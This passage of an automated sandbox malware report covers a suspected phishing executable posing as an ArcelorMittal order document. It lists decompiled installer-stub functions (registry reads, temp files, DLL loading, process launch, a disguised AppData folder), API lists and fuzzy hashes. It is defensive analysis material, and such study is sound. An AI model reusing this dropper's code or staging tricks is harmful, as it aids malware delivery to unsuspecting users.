                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
                                                              • Instruction ID: 0a841d9a538a1c78525c7c746850703aa7529d4a1cc505f1b812f839afa95e13
                                                              • Opcode Fuzzy Hash: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
                                                              • Instruction Fuzzy Hash: 4B219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B88A409B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E00405EFF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
                                                              				long _t20;
                                                              				long _t23;
                                                              				long _t24;
                                                              				char* _t26;
                                                              
                                                              				asm("sbb eax, eax");
                                                              				_t26 = _a16;
                                                              				 *_t26 = 0;
                                                              				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                              				if(_t20 == 0) {
                                                              					_a8 = 0x800;
                                                              					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
                                                              					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
                                                              						 *_t26 = 0;
                                                              					}
                                                              					_t26[0x7fe] = 0;
                                                              					_t24 = RegCloseKey(_a20); // executed
                                                              					return _t24;
                                                              				}
                                                              				return _t20;
                                                              			}







                                                              0x00405f0f
                                                              0x00405f11
                                                              0x00405f1e
                                                              0x00405f29
                                                              0x00405f31
                                                              0x00405f36
                                                              0x00405f4a
                                                              0x00405f52
                                                              0x00405f60
                                                              0x00405f60
                                                              0x00405f66
                                                              0x00405f6d
                                                              0x00000000
                                                              0x00405f6d
                                                              0x00405f76

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F29
                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4A
                                                              • RegCloseKey.KERNELBASE(?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3677997916-1824292864
                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                              • Instruction ID: 550e653c67ea0eb77a08417ddc9dcc7927ab5f79673ec66d03fd3a0aafaa2bf7
                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                              • Instruction Fuzzy Hash: AC015A3110020AEACF218F26ED08EDB3BACEF88350F00403AF844D2260D774D964DBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405C36(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                              				intOrPtr _v8;
                                                              				short _v12;
                                                              				short _t12;
                                                              				intOrPtr _t13;
                                                              				signed int _t14;
                                                              				WCHAR* _t17;
                                                              				signed int _t19;
                                                              				signed short _t23;
                                                              				WCHAR* _t26;
                                                              
                                                              				_t26 = _a4;
                                                              				_t23 = 0x64;
                                                              				while(1) {
                                                              					_t12 =  *L"nsa"; // 0x73006e
                                                              					_t23 = _t23 - 1;
                                                              					_v12 = _t12;
                                                              					_t13 =  *0x40a574; // 0x61
                                                              					_v8 = _t13;
                                                              					_t14 = GetTickCount();
                                                              					_t19 = 0x1a;
                                                              					_v8 = _v8 + _t14 % _t19;
                                                              					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                              					if(_t17 != 0) {
                                                              						break;
                                                              					}
                                                              					if(_t23 != 0) {
                                                              						continue;
                                                              					} else {
                                                              						 *_t26 =  *_t26 & _t23;
                                                              					}
                                                              					L4:
                                                              					return _t17;
                                                              				}
                                                              				_t17 = _t26;
                                                              				goto L4;
                                                              			}












                                                              0x00405c3c
                                                              0x00405c42
                                                              0x00405c43
                                                              0x00405c43
                                                              0x00405c48
                                                              0x00405c49
                                                              0x00405c4c
                                                              0x00405c51
                                                              0x00405c54
                                                              0x00405c5e
                                                              0x00405c6b
                                                              0x00405c6f
                                                              0x00405c77
                                                              0x00000000
                                                              0x00000000
                                                              0x00405c7b
                                                              0x00000000
                                                              0x00405c7d
                                                              0x00405c7d
                                                              0x00405c7d
                                                              0x00405c80
                                                              0x00405c83
                                                              0x00405c83
                                                              0x00405c86
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405C54
                                                              • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040327B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00405C6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-944333549
                                                              • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                              • Instruction ID: 8a35e51ea0d0ee70ea5c20e8edce62ba12a10af59c8f3d63fe044a56b3f339a6
                                                              • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                              • Instruction Fuzzy Hash: 99F06276600704BFEB008B55DD05E9F77A8EB91750F10403AED00F7140E6B09A548B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040639C(intOrPtr _a4) {
                                                              				short _v576;
                                                              				signed int _t13;
                                                              				struct HINSTANCE__* _t17;
                                                              				signed int _t19;
                                                              				void* _t24;
                                                              
                                                              				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                              				if(_t13 > 0x104) {
                                                              					_t13 = 0;
                                                              				}
                                                              				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                              					_t19 = 1;
                                                              				} else {
                                                              					_t19 = 0;
                                                              				}
                                                              				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                              				_t17 = LoadLibraryW( &_v576); // executed
                                                              				return _t17;
                                                              			}








                                                              0x004063b3
                                                              0x004063bc
                                                              0x004063be
                                                              0x004063be
                                                              0x004063c2
                                                              0x004063d5
                                                              0x004063cf
                                                              0x004063cf
                                                              0x004063cf
                                                              0x004063ee
                                                              0x004063fe
                                                              0x00406405

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
                                                              • wsprintfW.USER32 ref: 004063EE
                                                              • LoadLibraryW.KERNELBASE(?), ref: 004063FE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll
                                                              • API String ID: 2200240437-2744773210
                                                              • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                              • Instruction ID: 2cc1e6addeffa93896351747fd2b076c866e84041b4f9c80d347ce7491f0a061
                                                              • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                              • Instruction Fuzzy Hash: 6CF0BB70510129D7DB14AB64EE0DD9B366CEB00305F11447BA946F10D1FBBCDA69CBE9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E00401E66() {
                                                              				void* _t16;
                                                              				long _t20;
                                                              				void* _t25;
                                                              				void* _t32;
                                                              
                                                              				_t29 = E00402BBF(_t25);
                                                              				E00405191(0xffffffeb, _t14);
                                                              				_t16 = E00405712(_t29); // executed
                                                              				 *(_t32 + 8) = _t16;
                                                              				if(_t16 == _t25) {
                                                              					 *((intOrPtr*)(_t32 - 4)) = 1;
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t32 - 0x24)) != _t25) {
                                                              						_t20 = WaitForSingleObject(_t16, 0x64);
                                                              						while(_t20 == 0x102) {
                                                              							E00406444(0xf);
                                                              							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
                                                              						}
                                                              						GetExitCodeProcess( *(_t32 + 8), _t32 - 8);
                                                              						if( *((intOrPtr*)(_t32 - 0x28)) < _t25) {
                                                              							if( *(_t32 - 8) != _t25) {
                                                              								 *((intOrPtr*)(_t32 - 4)) = 1;
                                                              							}
                                                              						} else {
                                                              							E00405F79( *((intOrPtr*)(_t32 - 0x10)),  *(_t32 - 8));
                                                              						}
                                                              					}
                                                              					_push( *(_t32 + 8));
                                                              					CloseHandle();
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t32 - 4));
                                                              				return 0;
                                                              			}







                                                              0x00401e6c
                                                              0x00401e71
                                                              0x00401e77
                                                              0x00401e7e
                                                              0x00401e81
                                                              0x0040281e
                                                              0x00401e87
                                                              0x00401e8a
                                                              0x00401e95
                                                              0x00401eac
                                                              0x00401ea0
                                                              0x00401eaa
                                                              0x00401eaa
                                                              0x00401eb7
                                                              0x00401ec0
                                                              0x00401ed2
                                                              0x00401ed4
                                                              0x00401ed4
                                                              0x00401ec2
                                                              0x00401ec8
                                                              0x00401ec8
                                                              0x00401ec0
                                                              0x00401edb
                                                              0x00401ede
                                                              0x00401ede
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                                • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                                • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                                • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                                • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                                • Part of subcall function 00405712: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F48,Error launching installer), ref: 0040573B
                                                                • Part of subcall function 00405712: CloseHandle.KERNEL32(0040A300), ref: 00405748
                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 3585118688-0
                                                              • Opcode ID: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
                                                              • Instruction ID: d208eef208ec2c6f5187e880842865a00525bcfa3f2a05837fac4e2667901554
                                                              • Opcode Fuzzy Hash: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
                                                              • Instruction Fuzzy Hash: F911C431A00508EBCF20AF91CD859AE7BB2EF40314F24403BF501B61E1C7798A91DB9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E004015B9(short __ebx, void* __eflags) {
                                                              				void* _t17;
                                                              				int _t23;
                                                              				void* _t25;
                                                              				signed char _t26;
                                                              				short _t28;
                                                              				short _t31;
                                                              				short* _t34;
                                                              				void* _t36;
                                                              
                                                              				_t28 = __ebx;
                                                              				 *(_t36 + 8) = E00402BBF(0xfffffff0);
                                                              				_t17 = E00405A91(_t16);
                                                              				_t32 = _t17;
                                                              				if(_t17 != __ebx) {
                                                              					do {
                                                              						_t34 = E00405A13(_t32, 0x5c);
                                                              						_t31 =  *_t34;
                                                              						 *_t34 = _t28;
                                                              						if(_t31 != _t28) {
                                                              							L5:
                                                              							_t25 = E004056DD( *(_t36 + 8));
                                                              						} else {
                                                              							_t42 =  *((intOrPtr*)(_t36 - 0x24)) - _t28;
                                                              							if( *((intOrPtr*)(_t36 - 0x24)) == _t28 || E004056FA(_t42) == 0) {
                                                              								goto L5;
                                                              							} else {
                                                              								_t25 = E00405660( *(_t36 + 8)); // executed
                                                              							}
                                                              						}
                                                              						if(_t25 != _t28) {
                                                              							if(_t25 != 0xb7) {
                                                              								L9:
                                                              								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                              							} else {
                                                              								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                              								if((_t26 & 0x00000010) == 0) {
                                                              									goto L9;
                                                              								}
                                                              							}
                                                              						}
                                                              						 *_t34 = _t31;
                                                              						_t32 = _t34 + 2;
                                                              					} while (_t31 != _t28);
                                                              				}
                                                              				if( *((intOrPtr*)(_t36 - 0x28)) == _t28) {
                                                              					_push(0xfffffff5);
                                                              					E00401423();
                                                              				} else {
                                                              					E00401423(0xffffffe6);
                                                              					E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate",  *(_t36 + 8));
                                                              					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                              					if(_t23 == 0) {
                                                              						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                              					}
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
                                                              				return 0;
                                                              			}











                                                              0x004015b9
                                                              0x004015c1
                                                              0x004015c4
                                                              0x004015c9
                                                              0x004015cd
                                                              0x004015cf
                                                              0x004015d7
                                                              0x004015d9
                                                              0x004015dc
                                                              0x004015e2
                                                              0x004015fc
                                                              0x004015ff
                                                              0x004015e4
                                                              0x004015e4
                                                              0x004015e7
                                                              0x00000000
                                                              0x004015f2
                                                              0x004015f5
                                                              0x004015f5
                                                              0x004015e7
                                                              0x00401606
                                                              0x0040160d
                                                              0x0040161c
                                                              0x0040161c
                                                              0x0040160f
                                                              0x00401612
                                                              0x0040161a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040161a
                                                              0x0040160d
                                                              0x0040161f
                                                              0x00401623
                                                              0x00401624
                                                              0x004015cf
                                                              0x0040162c
                                                              0x0040165b
                                                              0x004021dc
                                                              0x0040162e
                                                              0x00401630
                                                              0x0040163d
                                                              0x00401645
                                                              0x0040164d
                                                              0x00401653
                                                              0x00401653
                                                              0x0040164d
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                                • Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,0040A300,00405B05,C:\Users\user\AppData\Local\Temp\nspD224.tmp,C:\Users\user\AppData\Local\Temp\nspD224.tmp, 4.v,?,C:\Users\user\AppData\Local\Temp\,00405843,?,762E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                                • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
                                                                • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                • Part of subcall function 00405660: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056A3
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,00000000,000000F0), ref: 00401645
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00401638
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate
                                                              • API String ID: 1892508949-2207273832
                                                              • Opcode ID: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
                                                              • Instruction ID: 415897e78b6bad03a127c6f6368a694d7e54beaaa1ae65b52f31c6ed2c47f3e3
                                                              • Opcode Fuzzy Hash: 6a1f85d338ebb5bb54d8052e3a08a01253941d961bae5fb58311d3ff7cefe74a
                                                              • Instruction Fuzzy Hash: 8C11E631504514ABCF20BFA4CD4099E36B1EF44364B24093BEA05B62F1DA3E4E819F5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405712(WCHAR* _a4) {
                                                              				struct _PROCESS_INFORMATION _v20;
                                                              				int _t7;
                                                              
                                                              				0x7a4f48->cb = 0x44;
                                                              				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f48,  &_v20); // executed
                                                              				if(_t7 != 0) {
                                                              					CloseHandle(_v20.hThread);
                                                              					return _v20.hProcess;
                                                              				}
                                                              				return _t7;
                                                              			}





                                                              0x0040571b
                                                              0x0040573b
                                                              0x00405743
                                                              0x00405748
                                                              0x00000000
                                                              0x0040574e
                                                              0x00405752

                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F48,Error launching installer), ref: 0040573B
                                                              • CloseHandle.KERNEL32(0040A300), ref: 00405748
                                                              Strings
                                                              • Error launching installer, xrefs: 00405725
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
